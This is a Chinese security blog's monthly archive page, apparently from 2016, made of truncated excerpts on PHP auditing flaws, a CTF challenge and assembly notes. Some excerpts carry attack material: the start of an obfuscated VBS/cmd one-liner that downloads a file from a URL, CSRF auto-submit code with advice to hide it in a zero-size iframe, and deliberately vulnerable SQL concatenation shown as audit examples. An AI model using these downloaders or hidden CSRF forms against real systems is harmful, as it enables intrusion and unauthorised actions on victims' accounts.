2016年09月_niexinming

12月 11月 10月 09月 08月 07月 05月 04月 03月 02月 01月

原创 php审计基础五:逻辑处理漏洞

（1）in_array函数in_array() 函数搜索数组中是否存在指定的值但是这个这个函数会在比较前做类型转换比如缺陷代码为：<?phpif(in_array($_GET['typeid'], array(1,2,3,4,5))){ $sql="select * from hehe where typeid='".$_GET['typeid']."'"; ech

2016-09-23 17:34:09 1053 1

原创 php审计基础四：变量覆盖

（1）extract()函数：extract() 函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。当代码是：<?php$b=3;$a=array('b'=>'1');extract($a);print_r($b);b的值被覆盖，输出的值变成1当缺陷代码为：<?php

2016-09-23 14:34:33 2073 2

原创 2016xctf一道ctf题目

首先是index.php:<?php$user = $_GET["user"];$file = $_GET["file"];$pass = $_GET["pass"];if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_

2016-09-22 15:53:28 39320 2

原创 php审计基础三：php封装协议小总结

【1】php://stdin主要用于php cli 的输入应用：<?while($line = fopen('php://stdin','r')){ echo fgets($line);}?>【2】php://stdout主要用于php cli的输出应用：<?php$fh = fopen('php://stdout', 'w')

2016-09-21 12:49:28 3182

原创汇编的一个小笔记（call和ret）

ret：pop ipretf：pop ippop cscall 标号：push ip jmp near ptr 标号call far ptr 标号：push cs push ipjmp far ptr 标号call 16位reg（例如：ax,bx,cx）：push ipjmp 16位reg

2016-09-14 01:04:32 498

原创王爽汇编实验9

这个是自己的一点理解，首先上源代码：assume cs:codesgcodesg segment mov ax,4c00h int 21h start: mov ax,0 s: nop nop mov di,offset s mov si,offset s2 mov ax,cs:[si] mov

2016-09-13 16:08:46 947

原创各种一句话（持续更新）

转自冷风大神的文章：http://blog.csdn.net/chinafe/article/details/46860051echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:

2016-09-09 20:57:03 964

原创一段csrf利用代码

function test(){ document.getElementById("myform").submit(); }上面是利用post形式进行传递参数下面是get方式进行传递参数为了让上面的代码更具有隐蔽行，把上面的代码保存成1.html,然后下面用框架包含，并且把框架长，宽都设置成0，这样就能杀人于无形了

2016-09-09 20:16:38 1693

原创使用Vs2015开发linux(centos7)程序

1.首先下载vs2015 with update3 2.然后下载Visual C++ for Linux Development（https://visualstudiogallery.msdn.microsoft.com/725025cf-7067-45c2-8d01-1e0fd359ae6e）Ps：另一篇文章介绍这个：（https://blogs.msdn.microsoft.co

2016-09-07 16:04:35 11924 1

2019年11月最新nessus插件更新包.zip

2019年11月的nessus插件更新包,更新方式： Nessus离线升级用网页上传插件到远程服务器的方式容易网络中断导致更新不成功，可以把插件包上次到服务器后，执行/opt/nessus/sbin/nessuscli update 插件包文件路径

2019-11-22

kcon议题《python 动态代码审计》，我已经将上面的所提到的技术广泛的用在我自己的工作之中，为我自己节省了大量的时间和精力。并且通过比较多实践，我把一些繁琐的过程和步骤做了简化，也填了大大小小的坑。与此同时，我找到了公司内部产品中出现的大大小小的漏洞，虽然这些漏洞没办法分享出来，但是我希望大家能从我今天分享的议题中学到一些有用的东西。这个议题里面提到的有些技术也可以用到php，go，ruby等语言里面。后续我也会把这个ppt中内容发到我的博客中，如果大家有什么问题和想法，欢迎在csdn上私信我，或者在我的留言板中留言

2018-08-30